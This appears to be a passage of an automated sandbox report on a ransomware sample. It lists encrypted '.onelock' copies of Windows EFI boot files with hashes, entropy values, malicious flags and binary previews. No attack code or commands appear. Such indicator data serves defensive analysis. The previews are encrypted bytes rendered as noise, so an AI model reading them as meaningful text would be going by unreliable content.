                                    Y:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997542530776212
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:911DD3F933998EA4F97043CF39CF8966
                                    SHA1:89A99BEAB6C5318A814A98DC999B7B0DFFD04DE0
                                    SHA-256:AEC0628A94A3FAB5E8A5D7325D49444878894B8E038FCF71F47A15F2242904F6
                                    SHA-512:44F65B339361605624EC37BCFAF184C7375EC9653700B876981B40A5DD0124767D80F6E642C54F931EA39CB8AA5775B8A5DBBB205ABA7ACE663E08C0AD8705D8
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s...B.k.9...D&....U.}<../=.......6.8cc8W......"..Aj.c...m...W..v8.:.......q..c..................'..)s..}....^].M.)C..M....Ywlw....M..rP.R.W.7.7L.&.i.I.....].~x.....B.........K..I.]..4..".a.O.D.L..pZ..%.P..$R..?0....*."...E...)-/.%....j.,.j....3.1aM.&......b..Q..L0o].b..I.g.q........x._.pt.Tg[.Q..w..a...>../`....dt...O......3.e.H.{&.=.o.C.)..!...........r....B.,....%.^....%v....l...(.......4.hkpt[..R....|rO...U.3.S*..F...g..5.X....o..5..........ir.G.......",.J{.U)........pp...Lhr}+.M.f.?K.u.B.pO....T.r..).....1..w.4.4.#b ...w..S.G...p;.O8.d494$..vD.x....Z.....J.7..h?....HF... .....O.}z-.....&...s.6.G-R..|...u...G...W....()N.. ...]T.NW@.1.ipI.F..{..8...V....}.'..*.......*i!.n.l.y.U.}...~.f.9.

                                    Y:\EFI\Microsoft\Boot\boot.stl.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.977106146342546
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:15A7E4840964F45D697AA42825282A64
                                    SHA1:8B025EBAAB1CE204C05C07ECED045BAC33504AD7
                                    SHA-256:0F7767FC96133CDDE48642E650955242C1DAADEE1548F4E14CBB03609F36D1B6
                                    SHA-512:543A8C0B23E745C60F612F545CAFA2354ACA2DCB728192728D163880762BE6ECD2CD0093E2F0E9A6FE4FF05B160D65F56471D0DA6D5CD64E16C0525B3E8C73A0
                                    Malicious:false
                                    Preview:.B..^(..[....h..A|.....(Y.15...$.#...N._..T.F..#j.C.......U.]q.......`,......"O7.Y......+*V.Sf....e..z....... iN.v.....;f...|,.NTw+......D.O.Z...vT.hc..0..*d0..=..{.GR'El...V...Z....).l&...A.....Q......sx....dX...3|`..@..x./..../.$-9f<...m..P.4...m1....e..ws.tq.Ji.1..=..z.....&.%\..........i...A._.........o/.Q.p...Kk...=Z...IF..`..~#...f..B.......i..M.d.}...a....y..3...tw/O.a.Z.:d.m.Qm.\.E..>)y..>V.@..oH7....bna<..E.Jf.ZJcl..d...W......P:.$....Xa.....?...@..Zq....?.q..#\d......H"c.Y.u<.8.......F?7.e.(..qc..k.m.:...P..#.......l.1.........9|L....4.+......a#...l...+....o..R..Y.zh.y&....<a..f.RT....-ku..t.A.i..*.&&:...rN..G.e.......s.'{.s....!....TQn.Q0....7..}.i....)$...R.G...H/ ..*O].B..'xS.3?b........h{....3.Y..(.i...h.Iuq...v..&....&.]..YL{..R x.c.T.[.SMlM&.v?....Q.b.y.:..`..'...A...Q...L..p_..O...q9...t.........8./v.......;.dS...&n....9SG.so.M....m.:..12..y..g..T...]%m@2).u..eV.....Z...........4G.T$C....x..0.v.5.y.&....,.,..w..V..%.

                                    Y:\EFI\Microsoft\Boot\bootmgfw.efi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1278488
                                    Entropy (8bit):7.999835151084896
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6A8808C992ED1D6DA1EAF2CD32DB90EE
                                    SHA1:9C3A2603239AC9DA9AAB158D72A7DB895E0E05EF
                                    SHA-256:01203FDC2B66A058AFBB18349326AFCFFD2CF93976433B367383939B4145F62C
                                    SHA-512:7DBD38C02750EBEFACDE396E91C3E01794E8F750C8B7253720990D731172706A02F192E2BFEABAEA80FBBBD73AF17369C1896B8902302155E8634F3B8E3ABC69
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|...L..a-!M.1.....|..W%_X..~..f.I..J{I....7^.f.pmH.HG....?..v._...VP:.......U...eO.kX....&...D:)8x...m..K}B..H<+...J....^.k..A..Z&.5".....'.......c..vx).D})..Wx.@... ....ZYr=...^..*.c..H.<...0../..=.t..d....^.......V..t..Aa...Y..?B.6.....I.....a./3iv....D..<W.....Y)U.....!.D.!..@...\ZGt..x.u.V4..v...b..p.. *.O.Dt;u#.G.C.......S..Q..Ai.=..m....n......n..^..c4.....o4<.v...I.....b...S.b.!UF.."*.D.ap.z5Y3_...)mq.h.)'...s.J...^.[=..W..6../r.[..Na.$P......'~...dh..`..Z!...g..{.$..!....O..o...$p.....@.........h).v........n..T.........-X.M.....F_..*..Nt..[...+(4..U7.F..RL.~....2ND3.}}cH:.X,;5...A> .1..E...Q..H..).+...]...T.P.....To.G..<.f..|...z..b.{...q.N.i.KN...#........pV............[>i....!...Zh./....sG"s...d......5.U8.4.5h8...2.b.0..e/G.YJy.....9...@.....`.6.....|.<...R.*..j.=...}`\..P.+...u..*9..`-^.+....+[.. .*.(..:S......(.^.6..h...F..$..)..t...`.......4.).r..>'..4.....I&..=.F..*...6.s.

                                    Y:\EFI\Microsoft\Boot\bootmgr.efi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1262104
                                    Entropy (8bit):7.99984657105943
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:D600D0E6068CC05EFD4FA88558C49893
                                    SHA1:1DF94612451C1DA566EFA574F53B859E7B3F23C2
                                    SHA-256:7DD67B417A016B74EA67866CC8848EDB21F2867756FC701A1666D450953C680D
                                    SHA-512:E3C71BE14FF2975610EA3F6D9D0E56F057B109F039B677985703552BD61ECA6629D17BD4526798BF805BDDEA52200449A1837C0F4519402492F04902DB6BBD3B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|.....@....`&....Od.q..Q*b..<.n....0s..$.N.K.5I*%..........j.....4~.>IQ.{1Q..Acr.rp........<l..X...A)i7..F!~.Y..@..&.s.X.^|.6.......G.g-...;.q..-..*..Z.<...a...3.&1.V.....s...Q....u...U@..T..^....k..?e....|F2.Cq.8...Mz.)..2. .....6u:.f..........8...PQ...... ...4Y.`..O.2.j."....{{/T0..1?..+U.f...k.....o..H.F.*61k~.e-#I....C3?|x.............9QR`E.#.q.H..?....m.u.]K....=4.M.....:-.[Lh.N..0!....=...X..G.|..J.. .[....=.....oa.....,V..N?&....z..t......`.#..E.&.D@..~...d...q>.k.K...w.*.......m_......A.|..'....".........a/.L.,..'..5.4..b. ..-.O.L.W.......e...yW3Y.Hy6..>..U?.. .......^..-.|s,./u(..>.F...:.^....d.Z....E ..4.......aFp.5J...*`..|.....\4...& ./*..X...,.J.Q.Le....1...(.%.3Vt...T.=/*x..*S!=.....Px..R.S..q...o.......3....L.r......3..)r/.2.u..w@Zq..L......A..dN..=..A....G...e.:>......K+4P..?....>...Jo.9.c..5...jm.+........;U,Q.p....A,.4...\.(...w.X....R.r.]..2.$Uv..F;e.)?p.T..f.?.t&Z....dX9./..e.v.

                                    Y:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997876790440874
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6505327C72B7D67BF353BC92DCB6E57C
                                    SHA1:C52BD09E2CC6B3FFFCC5AFC8224204429677B4D1
                                    SHA-256:327C38636B3F2AA1239AB4E8FB6687C91A37C7E8C915CADC2EA1D91AFF1B0AC4
                                    SHA-512:4B59FF73CF9A998BE5F0B74FDDDB94E0F6524A1354150EC130677955B39064CD9ABA121499171C095CF09657FCBD5ACEF85DBC1DBAEDC0EFA6E7B0861E629F93
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b.3......j.....LSz.`..^5.8....;.)...N.}R.V.wz!m@....K.......X`..i...8s<}....$.a..+..RS.XA..\.3..w...;_"v ..$.P_...>v..H....~<...x...y\s.O*..^i=....j...c.F.S.....UIX7.@.BP+..9^......~.&.R..m..p_.3)...W7rZ.[....W .2&...G..(V?>.q.sT.P.zkH>....5...t...Pd...T.6*....}..W...3. ..8..... .....>.p?.djU[......4l..rS.WQI..u1.?....X.]]..8.x`8..Z.-.G. g.'.._L.....>. 9.j..\l...l.w..$.7.....TtQ.`.v.%..m..M........."5..Q..c..h.%...p.|...."._.Z.!|*.UD7..U.........Go..d...y.ZJ%._.....(.....-n.NN......!...E...uF..T.@....qy.f}6.F.kw...q...5$BYIyFZ.1WyA..Ju[.........,s.l...=.Q%.:.W,...$Ls'l`S.P....Q..V.s.?.[...=f.i.rl...."..T.T.`.;...C.*.Q.A.s.XrF..<..Sg6g..s..6...0.o.'.w.iP.\W.YZ..-.:CN...;........r...

                                    Y:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.9975219340305745
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:9A5933D536D7725F5130CE760B1EA4E7
                                    SHA1:82B2CF4AE8E317CBE27146C5E4CFD7A34D01D7D5
                                    SHA-256:FC882D55F343900197BF9179B82864BD0A4C5F44B58780340BE72E48D80C828F
                                    SHA-512:36AB179FE39F7D7DD1790F175ECF78A49F4C78EACC2B8E86D813C6A21A79B90F7C9F9C7E5CE2F1A053E02628D61468E35B21D4EEA9EA967009E194D5E2D791FD
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b...H..K....N./.....~..C..Ho@.j+.A....p.Kd...p..^...<y.....}.p..<W..f7..k]P.Ap<..di...7..1..[........F...H....f..c..q@Xw....).*....n...Y.,..BH\..4..h.}....s....@7.?...91as.g.@..e.o@..Dd..D...6#./a.\]3....,...#n}.OUW......79cy2?..of.....x.[5N.....zP".LS..G....k......VCrT.N.0.......}he.T"_......adPd..T......eLH..x.c.(.....<.HU......5/8...&..%`.o...G.H..I..J..e......K...^.7~8..!~.9(.;.|:....{.M..-...q0.S....q....{m.=..u...vT.N*.gs. [...!..#...x}.u.K.S.o..!^.1..... u......^...._m.....6..._..`0&.[F.<D4...dK..d+A.h........5..8l.%4..-j.N;`.ji.}.h.o..ac.v'c.TX[D#.j.S`jsO....U0..,........."~.....${K..R.....&f...z.........#la.%.f..RI!r.g...s..!_...].0...q...?.m.....C[.;...c..r!...r....Y,{'

                                    Y:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996397772671244
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:496851E723A776AF94BC98563BD346FB
                                    SHA1:BD61BE1C792DDBA609E7FCDE614B4FB1EDB286C7
                                    SHA-256:39842674385EB5B6951B1AB5A08FDD965F9AF2FE6EC2F6733925C03F362DE8FA
                                    SHA-512:E8ED84689C0256621CF570BDFD7CBE38C0B67FF88C4309703D2627FB1FB30D5AA12CF27E390E29166D1D1B85EE892DE007371DFF127D6B2086782735F7B18F72
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3#..2..].G...|.6.Q;:J....Cv.?.......N..X.8.......OAn..K.+j....(`.O..P....U.!........}...=....q.q....P..}...I.i.!.....*I.K.e...`J...T?.4...s..B. ..N...Z1....._.A..Z...S..6T.....f.~......9..D..K..Z}&...Q~S6..F-.ox._.o.L:.|.....=.....oj...........g.y%...k.G..6)jz..0.g.Y.P...19E.}.. <HD.!-...2:....s.o..%k."R.=ZIa..6......nx..G.U=i.. ..f.P...sc.....?.r.<...@.z*.....Ey&91.RV.`-......[.V..O.'............J....q74z\...df.l2Q6f2.Q...0.=..$.c.].1..\Y.......xF..0.9..-.x.,7I.|.!S....P.5Z...O..@%..|.._.B~..*...o...C....:.JE'V......f.{.'6.U[&....4...s.+..H..#..}.s.:..u....(.....G...T.O|d^...#.-Y%.%,.}N2..k.K...gX..f..9.....&...Nl?..\A.TsV.4.zT...{9....J...0.....a7..I....h...1..7.o..X.4.t...Vp..E..

                                    Y:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997912558646714
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6CB96AF1730E254EDC4AADFD02A3A624
                                    SHA1:DB5A4121C4C0265693F5D52DF141A4AA468462B6
                                    SHA-256:E7DF15F2809F3165DF9590922E29AA94F2F655F63D3B2330D894675C45F40E32
                                    SHA-512:441C335E53AF653F9F4EF36FBB5005387317FC08A408342CB8F5DB8F8959B0C5997FA691EA9FAF86FD4FC981BAD5514DB6453E5F7B285F990395A91FE4CED517
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z....I.u..G...e.........4..0.... .hBv...v.q....`..,V.........o\. w..{.N.._.L...$26..L.Qy.1+{.......Y..r:..t..&.a.O#..<U.B.|G5.*....w.+.R...T.1CT....M.......`.4....z.dg.......2....G.G4._Z.@......Y....3e.b......$nergpe.".!..q..=t...mV.....r.....22..,n5.r M.,\`.M..)..\.I.. ....el.+.].3!~.....$.e4 12D.g.[......q..4F.&P..b.[..Z..D].#.N..x..........sL....[...U.T(.....u...2.m..^.Y%.A...S......~o.J~.>.L....O-....@..\u;. .b.......9X....VKO.E"+;..-.B.....K[Qsd..w..*...XD.H<....+..X..s,G....H.....3.%.d{..~..t....hR.t...e.dM..........R..-..L..O..Ft.)gK......l.h.A......%.+.......u..%.. .u't........~OvZ%....j9E.#.....U.!...A<....I+.>g..83...b..mY.6.M."...yIsD,@..wgq1.qX..p.V<.X....k.Q{........

                                    Y:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997696431355067
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:79D752710950DD9ED891028EEE5CBEEA
                                    SHA1:8D3EFAEFC80436E05C75E50183797E7CD415A403
                                    SHA-256:A0F97EFBDB2EEE752AF45A50721CA0975F82B1EDA11444FA2F7E18E874AF0858
                                    SHA-512:D386A225871F1F7CC57EE884580535F0186F8ADCB7BC3DB7D23956BEA3E68C1D40EE13F0B3D9B2829AC7EC49ECC75170617AAA4E888961FCC961ECEBA243BD74
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z.....&...X....j_.\..-..E&.}.:gqXa.n..B/5.K...?.E.[.W#JF.......R....B_m..mf.X.p4..V. ....zp.V.....s^..fa.......:@.%...S..W.q....UM.W.aG...Ix...p.....`.....'..s..c...L.........|.nC^..qX.._.....8[..I..d.....?..0..&..?....e.l.c..w..:.k%..(-..g#.Y..z.w.6..WR.F9.n.$.5...h.-d.=.8bI[..UM.....b...L......._...*,b........8....H..1.j.{:...bv.M.|....Y}...".I.k.f..k....(3..lM.O_.....n.u..tAd.Nomc*.<^...R.....b0X.7....8./`B....?S....4g...(.wC.F..7..^`...'...y..7.S....[..i.Wn)E:lM(0......L.9.&...%.=..o...u.vVW...~..kG.+.Q.Y."a..N.,..o..3..X.....g|..B.......i.4p+JCK.7...T9..<A....J..0....=YA..^...*N.`..k....RX.1.B.R.....U<n..........A.._...g#%m..*...e,gR.2N.70..>h.....@.E.-.h...;..n.=.[~...X.m......

                                    Y:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996178586060663
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:CADF34548F20A0F3D9891D55BFE4A9BC
                                    SHA1:D99BE55438D04BF89CED02C67BCA3DE3EF89C2A9
                                    SHA-256:7D53490F5265BF1996924D59401A069F0F8ECDFAE10ADAF9F5A5D20E7D577456
                                    SHA-512:DAED53C25B3A8306B4180BF48A0EAFBF7F352440E21D2B4B9A6B270AD96E2EEFE4F1E28E90802839AD8BA83E966083306473D7FA35AF0E756A75130EF6086F17
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3.......5.^5^h....5.....eb0.'......n.z..F2D...."..... ......{2...l.4h.P..L..J.E.O..9..tp.R...n@.2|.......W..Ar)..o..q~-4.......q..1G#..R...N@.4.6.OP`..D...IX...[......#$..}!0(.#...OR...\aL...."...?dx...7jwY[.[?.....x8...=._.=:.....!1?.......%...XCx.z...........&.}(.*}Y.N......`sC....C......(..h4i.h..l..lh.f..D8;.h.Z./.....}v1",..r.......}...Ke....).k...gz_....,......V$.].#D...PkBK.F.Cz......-/?.m+./;.z...%.*..R.{..MW...3.7QlN..g&.+.]...f.......U|I^...jk.u.+,.Jl....n.7.h...#..PB...Rr:..+fIl.>....L.i.j...F%[.A4.........N..Bi..j.Z...X..?H..,.[..6.I..jU....t=N..s..B..qz........7..zc..@..{....M.VU9G.L.YQBd<..._.Gp...uI.I...ha.5.K........$u....;.6.0....ut...R^^.....%..$..*...s~............,.q.

                                    Y:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.998205419992001
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:65CFC587ED38CFF0305427CCA99479FB
                                    SHA1:573701A66FF6B76390EBFB6DBB622EA48F3F6313
                                    SHA-256:4B5F5F67C3926BC9FACD5F49515382D007FFDBB19458BAF38E36D1A934847DA9
                                    SHA-512:CE93FF34A8C3D53F1100FF2EC8302147C1F1FA22C2504A8196D198CD582991A07FC62A55EF3ECCBFCD14D7179EE967FB95564497CE58C39CD6F88C1BC6141B8D
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s...NE!..T....)..m/<.-.]..R_.1k........#....i.u;..xu........7.W..x.....i..VJ.......AP.{.."...[...._.....U..........w.J.I."j4...4....!.....UMqp.'.P......#b!....p..p.....dm..m...D*.g..5.(q....C4#....".q'7..._..........5..'.....?.E..7.. i...sF....`&....dQ..Bh3D1....3....y...bP...o\.....,[.V...y..[.`x?>.z>.^. N(.b....4f.).F..8.....~J. ...a..R.......[uY.b-.q0..D.g&E.6..g..h@....h....!..\......vV..c...N.%.9....2SIQn..X..A.'.].;xC../.&..o. ...cj...@.D..h..w.....@...x.....O........b.>.a.Ax.Wv'.#.L..f...}|WI.({~f..&F.BN..P...2q6.".k._t.n.p....t....zB.......~.x..t..I....f....9o5|>"...A#..{....~rV.6(.5W........-.]e......R.*.X...+x.p.>.J.D.+7tzz0.......C......l....y..n.<.K%.3.>.~..`....Si%..:.]..i..I.

                                    Y:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997618400259809
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:A0C8D45C64147AD8F5D271297D933566
                                    SHA1:254A17AE38F420F7983A128CA6C417B5C8FEDEFD
                                    SHA-256:FF25DB5B3EE3A5C2281AB85A88F530C24DF73182CFA5713AF09B202559B8ED2D
                                    SHA-512:2F414E2BB9FC507F28AF2D3306913992D6DEFF5399073BDD55A7D1E417128A5ABE0342637BC10F858FD2FC21C43E450773DEE7BE73277D2E4F4485BBA175A922
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s.......d...d...y....j.F.M.N.P.Gxc..N....9.....W....:.[^.......T.B....$#.w.Z_.y..>.v.......n.?...]F...WE...0....{g...-.Zy...8AR[.hu...5ZR....G?...3..t.,.O_.N........Db.J."0...rl~..?O..u..f...0.......}q.......s.].h..1..&...fP.....}70.Z.y....J.$=..p.TS..*......~6....R.C...5}.H..` k.e..B..<.....,.....,....E..,g..; 0.^Z.`....Z.9.2...g..1c..0A.~..<0/.\..Xp.+..<"..*a.V.a.x`._.>.G.."...}.CJ....IK....$i.X&.q...tF..A7!.ms$v%.PP_.N...M...j..+n.lw.....#..r....{1.i6.Z4<.P.......h\=.V.(...4.#..H..|.'...@s........<..........{.c.&B...2S{^.$1...8.O`.\.....q.../..|..k.`Z..\..>P..i.o.....X.U..F.....T..#.d.q~.hP.N.+K..-.W.9..D...su.CTa.E.'_{..~.u.*....4..^M......>k....xO.Xz.......G.Y.w..{.(....t....R,]C.Y.V

                                    Y:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996494406237935
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:F2C396DF9DE478E729E6C66FC4E5A033
                                    SHA1:9526982D6795DB6EE9F8D29C1B1F121F868A1D9F
                                    SHA-256:45BE2255EC77F5218F1E8E53DB62FF0ED28809F2E43DAC78042C693B4F9D7B4B
                                    SHA-512:10ED7648672A29E0AAE03C15A6FF2F985D9265454DC76772170EC4A8144EDB40702E764BC82A9B924390C97CE7029C9DF54293782EAFB6AFFE2AD8C30C6D0E73
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..;.K........<...s.`.;B5...."|F.J..mw...&(.R.Q:..^...+.V..?.z..)1....../.^f.zj.l.%.`"/t...1.t7...2.b~@..d~.%...H.....I.t.j...cJ?"H'l.Cf..q.....#....1...o.......J.....]HI......j.......b.R..b....e|.q......n.d'Z=."4."&.y.Ce*.Pt.,.s...b...J.#....K.......XF..f3..$...B..j.\Mv.C.4`e......O"......"}....H^...3.V.y...f..(.'.|...F.N...,Z)"..%....;.F.b...f.].1_>.F*}y:$]..;56.6.=a..\\..{.w....Z.....v.@J....|c.$A..]>..'..w+.....9./.......+x..d.[....c..t/x.Qw....[......V[..-O.:...,5J.m[..{v.;&bv./..2.q.l...5.P...XG...|'....v..;...[.Q......h....C...m..[.)..-.#..I......E.. ...F.R-..oZ....|l...Qy...j^5=+D...K.y3..Q6.....g...E..(..M..u...>.(.YsO.....$...9*?....D<.~..!.'...z.;./q...wX.<..H.....'.cb`N.....po..x....R].D...T`..(....aW...S %.j........

                                    Y:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997460280988206
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:08908AB6D9CB30C818DEA8D2D4EDA057
                                    SHA1:F1E311644F00369B2BFB662811ECE31B4F6CEAAF
                                    SHA-256:B27E5B95954B6F095382B71074F5FD2BDBE1F181D82B53DF79DEB9F686715974
                                    SHA-512:F46BA8CE507EFAB136B2CDE01AB08D30B6CF04266214B1051983D588FCC8BB1B3E4B1648691C61426D841BD6A7710FC81833F9002D0D25379EA2C0959CC39E52
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....&n..p...1.a.X...9b...^....n..o.@L..E.P.We....,...%.-......=hx2i..I.z..J..8=..X#".j........K........!?$.bY........h.e.}8.Wf.P..!P...s..k.-.v...WV"...}K.e.A..R\.`...)7F].v...(...%+........Y...HK.4...U7.]GB..,.Ij....(F...F.../o...V)...>y.....4.B)l*.'.......$.Y5.....-*........>.o.. ...>. ......3qR.y..(.|rv..{....Mk..(.m....Yx`Fq......K.d~..?..'4-..6...(...;.)..3....y.g.\.8....jVC@.%}..N.}.......-.O/M.a1U....b.....B}x...5B/..p.t=f...+`.l........_..r...V$.....Z..g(.u........P.V5....5.R/.W..S.5.d]..9.C...]u....)B..9..[....!,..s.%....mZ.V)..=......I%...^.v.wyw..M&.M..E.2N..l....;..*........8............z..Y5...@U._.s.....R/.s.-|.....r.....o./8j........~..3/.]N...[Q.X...(.....(&^.tc..p.{,.'.S5sk......=...5.7.J.4........ux...a).$..#

                                    Y:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997723125585943
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:4E4C052CA08069AD3F7216BDC554D467
                                    SHA1:A5F060BB626E8CFA7999C48231F8D7542BE8ACDC
                                    SHA-256:1A0F59E9726A79749B9681ADDFDB7B69E5FA445AD52759391F3322F5FDC3C1D9
                                    SHA-512:E7CC6EB9EC02E7D308B9ECCD2D725DC52D3172BB9594ECE0621DBE932BDE4B56831B4216CB54D42A7CC12A54A29AF8CACE21B85657E19D20066DD21F83AAC431
                                    Malicious:true
